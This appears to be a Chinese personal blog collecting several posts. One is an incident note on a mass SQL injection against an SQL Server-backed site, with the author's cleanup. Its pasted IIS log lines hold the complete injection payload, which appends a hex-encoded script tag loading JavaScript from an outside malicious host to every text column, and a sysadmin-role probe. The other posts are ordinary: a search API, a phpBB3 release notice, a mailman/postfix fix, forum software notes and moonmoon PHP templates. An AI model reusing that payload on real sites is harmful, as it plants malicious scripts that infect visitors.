LiangXu Wang

昨天晚上李老师打电话过来，发现西部数据中心访问有问题。
经仔细检查，发现网站已经被SQL注入了，SQL Server中所有字符串字段都被添加了尾巴，指向了一个病毒网站。
再次检查，发现最近的一次数据库完整备份是在年前了，而此期间又注册了很多新用户，因此只能手工清理了。
这里主要是利用了SQL Server中的replace函数：

update table set f1=replace(f1,'xxx','')

手工清理了所有表中的相关字段，这是个体力活。在清理过程中还发现了membership表中居然有4个重复用户名，这个错误检查了3－4个小时才发现，晕。
log记录显示了如何注入的：

6985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={616cf641-13dc-4f2a-ae40-6a4d8f42ddc6};dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:02 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={616cf641-13dc-4f2a-ae40-6a4d8f42ddc6}';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={7ce7f0d6-7b5c-4136-82cb-eca3a2083902};dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={7ce7f0d6-7b5c-4136-82cb-eca3a2083902}';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={616cf641-13dc-4f2a-ae40-6a4d8f42ddc6}%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={7ce7f0d6-7b5c-4136-82cb-eca3a2083902}%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /useterms.aspx id=1;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 200 0 64
2008-05-27 00:08:04 W3SVC1565836985 210.77.68.241 GET /useterms.aspx id=1';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 200 0 64
2008-05-27 00:08:04 W3SVC1565836985 210.77.68.241 GET /useterms.aspx id=1%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 80 - 218.246.32.206 Mozilla/4.0 200 0 0

因此，可以看到黑客是利用218.246.32.206这个机器来操作的，但搜索这个IP地址，居然发现多个结果，估计是利用工具攻击的。

同时，CSDN上还有一个自动的恢复方法，这比我手工恢复要省事多了。

发现，这个攻击是针对SQL Server的。

如何调用westdc的搜索功能？
WESTDC的搜索地址为：http://westdc.westgis.ac.cn/DataServices/SearchMetadata.aspx
而参数的传递方法可以使用GET，也可以使用POST。
具体参数包括：
q, 全文搜索的关键词
e, 经度（东）
w, 经度（西）
s, 纬度（南）
n, 纬度（北）

比如，使用get方法的时候，您可以直接调用：

http://westdc.westgis.ac.cn/DataServices/SearchMetadata.aspx?q=沙漠&e=100&w=50&s=50&n=70

也可以使用POST方法调用，代码如下：

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
</head>
<body>
<form action="http://westdc.westgis.ac.cn/DataServices/SearchMetadata.aspx" method="post" name="form1">
<input type="text" name="q">
<input type="submit" value="submit">
</form>
</body>
</html>

效果如下：

终于发布RC1了，而且开始提供升级支持了，也开始接受语言包和MOD了。

Hello,

We are very pleased to announce the availability of the phpBB3 RC1 package. This is the first release candidate which is meant to become the Gold release if no more bugs or problems arise. Of course there may be more than one release candidate.

With this release we will give full support, allow uploading language packs as well as modifications and styles. Please note that during the first few weeks support questions may not be answered as fast as with the 2.0.x line. We also only give support to those having a clean RC1 installation, previous conversions or updates will not be supported. We encourage only those running the release candidate wanting to test out the new version, it is still recommended to wait for the full release; after all this is a release candidate.

To re-iterate the support guidelines, we won't support the following installation types:

* Updates from phpBB3 Beta versions to phpBB3 RC1 and higher
* Conversions from phpBB 2.0.x to phpBB3 Beta versions
* phpBB3 Beta installations

We give support for the following installation types:

* Updates from phpBB3 RC1 to any higher version (not relevant at the moment)
* Conversions from phpBB 2.0.x to phpBB3 RC1 and higher
* New installations of phpBB3 RC1 and higher

For all those not needing support and want to take the risks... the database update file is present, though we were not able to provide a full update path due to the style and database changes. If you are running on mysql 4.0.3 or less you should completely re-install, because the complete schema changed for these versions.

A short explanation of how to do a conversion is included within the provided INSTALL.html file, please be sure to read it.

Conversions from 2.0.x to phpBB3 RC1 may be problematic, depending on your setup and the amount of MODs you installed. If you want to be on the safe side we suggest still waiting for later releases before you fully convert your 2.0.x installation.

mailman： 2.1.9
debian etch
服务器上很早就搭建了postfix和mailman服务，但后来又产生新要求，要求mailman中再添加一个域名。原来做过多次尝试，一直未果。

今天把服务器升级为etch，顺便把x和gnome都干掉了。然后想看看这个问题能不能解决，就又试验起来了。

http://www.python.org/cgi-bin/faqw-mm.py?query=virtual+domain&querytype=simple&casefold=yes&req=search

开始都是以为要查询virtual domain，进入了误区，结果一直无解。

官方文档：http://www.gnu.org/software/mailman/mailman-install/node13.html
看了上面的文档后，又实验了多种配置，还是有问题，发到新邮件列表的信一直自动转发到老邮件列表上，导致查无此人。

Reporting-MTA: dns; debian.westgis.ac.cn
Received-From-MTA: smtp; debian.westgis.ac.cn ([127.0.0.1])
Arrival-Date: Sat, 30 Dec 2006 12:09:02 +0800 (CST)
Original-Recipient: rfc822;westdc@lists.westgis.ac.cn
Final-Recipient: rfc822;westdc@list.cngis.org
Action: failed
Status: 5.1.1
Remote-MTA: dns; 127.0.0.1
Diagnostic-Code: smtp; 550 5.1.1 <westdc@list.cngis.org>: Recipient address rejected: User unknown in virtual mailbox table
Last-Attempt-Date: Sat, 30 Dec 2006 12:09:12 +0800 (CST)

修改mm_cfg.py里的相关参数，都试验了一遍，错误信息依旧。然后查看到syslog里的出错信息，也是邮件地址的后缀自动变换了，非常奇怪。
于是检查postfix的main.cf设置，看到：

myorigin = list.cngis.org

想到了是否和这个配置有关系，于是首先修改为另外一个地址，然后再次试验，错误依旧，但错误信息发生了变化！
于是把这个配置注释掉，万事大吉！
想想好像这个地方原来是专门为配置mailman而加上的，没想到错误会出现在这里。当时好像是参照网上的教程直接搬下来的，还是官方的文档可靠阿。

这个问题已经都快半年没有解决了，今天终于解决了，爽阿。
此办法的缺点：各域名之间不能创建同名的邮件列表，即不能同时创建a@dom1.org和a@dom2.org。这个问题在mailman 2.2的版本中得到了解决。

一直没用过metaForum，只是在浏览AWN的信息时发现其支持论坛采用了metaForum，很新颖的一种论坛组织方法。官方网站在http://www.blursoft.com/metaForum/。

首先来看看metaForum的特性：
1 新颖的论坛视角：聚焦用户需求而不是系统需求；最大化提升点击效率。
2 无须刷新的页面显示方式：支持实时自动更新主题内容和主题列表。
3 采用AJAX进行组织的WEB 2.0：从AJAX & Web2.0中吸取了大量优点，可以后退，历史记录完整，内容并没有被AJAX隐藏－因此可以被搜索引擎访问到。
4 基于用户的管理：易用的管理系统，任何用户都可以进行管理并贡献用户的等级评定。在没有删除的前提下，可以调整推送到用户前的内容的阈值，可以根据阈值判定垃圾，可以判定一个主题中最好的4个帖子。注意：并不需要刷新！
5 采用频道概念代替版面和子版面
6 高级的引用系统：可以直接引用帖子中的部分内容
7 先进的预览功能：可以直接在主题列表上进行预览。
8 采用保密主题代替私人短信：可以一次发送保密主题到多个接收者。
9 其他特性：文档备份系统、完整可定制的CSS模板系统、加密用户认证。

其中有些概念挺新颖的，如引用系统、保密主题、频道系统，但我试用了一下，目前还不能支持中文，虽然论坛是UTF8的。

在前面的基础上进行的修改，这样就可以跨域进行调用。
title.tpl.php

<?php

$all_items = &$Planet->getItems();

$current_date = date('d/m/Y', time());

?>
var title='<div id="content"><h2>Today</h2><ul class="cheese">';

<?php foreach ($all_items as $item): ?>

<?php

if (($item_date = date('d/m/Y',$item->getDate())) != $current_date){

$current_date = $item_date;

$t='</ul>';

$t.='<h2>'.$item_date.'</h2>';

$t.='<ul>';
echo 'title+="'.$t.'";';

}

?>

<?php $owner = $item->getOwner(); ?>

title+='<li> : </li>';

<?php endforeach; ?>

title+="</ul></div>";
document.write(title);

为了可以更好的给其他网站调用，对现在的moonmoon进行了一定的修改，使之可以通过js进行调用，也可以直接通过页面调用。
1. index.php
添加了：

elseif (array_key_exists('type', $_GET) && $_GET['type'] == 'title'){

//Serve full cache content

header('Content-type: text/html; charset=UTF-8');

if (!OutputCache::Start('title', $first_item_url, $output_cache)) {

include_once(dirname(__FILE__).'/custom/tpl/title.tpl.php');

OutputCache::End();

}

}
elseif (array_key_exists('type', $_GET) && $_GET['type'] == 'content'){

//Serve full cache content

header('Content-type: text/html; charset=UTF-8');

if (!OutputCache::Start('content', $first_item_url, $output_cache)) {

include_once(dirname(__FILE__).'/custom/tpl/content.tpl.php');

OutputCache::End();

}

}

2. 增强了两个对应的tpl文件
titile.tpl.php

<?php

$all_items = &$Planet->getItems();

$current_date = date('d/m/Y', time());

?>
<div id="content">

<h2>Today</h2>

<ul class="cheese">

<?php foreach ($all_items as $item): ?>

<?php

if (($item_date = date('d/m/Y',$item->getDate())) != $current_date){

$current_date = $item_date;

echo '</ul>';

echo '<h2>'.$item_date.'</h2>';

echo '<ul>';

}

?>

<?php $owner = $item->getOwner(); ?>

<li>

<a href="<?php echo $owner->getWebsite(); ?>"><?php echo $owner->getName(); ?></a> :

<a href="<?php echo $item->getUrl(); ?>" title="Go to original place"><?php echo $item->getTitle(); ?></a>

</li>

<?php endforeach; ?>

</ul>

</div>

content.tpl.php

<?php

$all_items = &$Planet->getItems();

$limit = $PlanetConfig->getMaxDisplay();

$count = 0;

?>

<div id="content">

<?php foreach ($all_items as $item): ?>

<div class="post">

<h2 class="post-title"><a href="<?php echo $item->getUrl(); ?>" title="Go to original place"><?php echo $item->getTitle(); ?></a></h2>

<p class="post-info">

<?php echo $item->getAuthor(); ?>,

<?php

$ago = time() - $item->getDate();

echo '<span title="'.Duration::toString($ago).' ago">'.date('d/m/Y', $item->getDate()).'</span>';

?> |

<?php $owner = $item->getOwner(); ?>

<a href="<?php echo $owner->getWebsite(); ?>"><?php echo $owner->getName(); ?></a>

</p>

<div class="post-content">

<?php echo $item->getContent(); ?>

</div>

</div>

<?php if (++$count == $limit) { break; } ?>

<?php endforeach; ?>

</div>

3. 使用方法
若需要调用title的显示方法：index.php?type=title
若需要调用content的显示：index.php?type=content

数据中心的BLOG系统采用RSS聚合程序，可以使个人还保留自己独立的BLOG系统。
目前最常用的是planetplanet系统，但是其是基于python开发的，而目前团队里还没有人了解python，因此就选择了moonmoon系统，虽然系统简陋一点，版本是0.2beta，但功能还是齐全的，开发语言是php。

tong的blog是msn space，而msn space目前还不支持基于分类的feed，因此只能进行代码端的定制。
修改app/classes/Planet.class.php文件，在286行附近添加一行：

if (strpos($person->website,"spaces.live.com")===false || $item->get_category()=="westdc")

这样就可以专门针对msn space的blog系统，提取固定分类的日志，如我这里提取的就是westdc分类。
剩下的工作就是对界面的定制，使其和整个系统一致。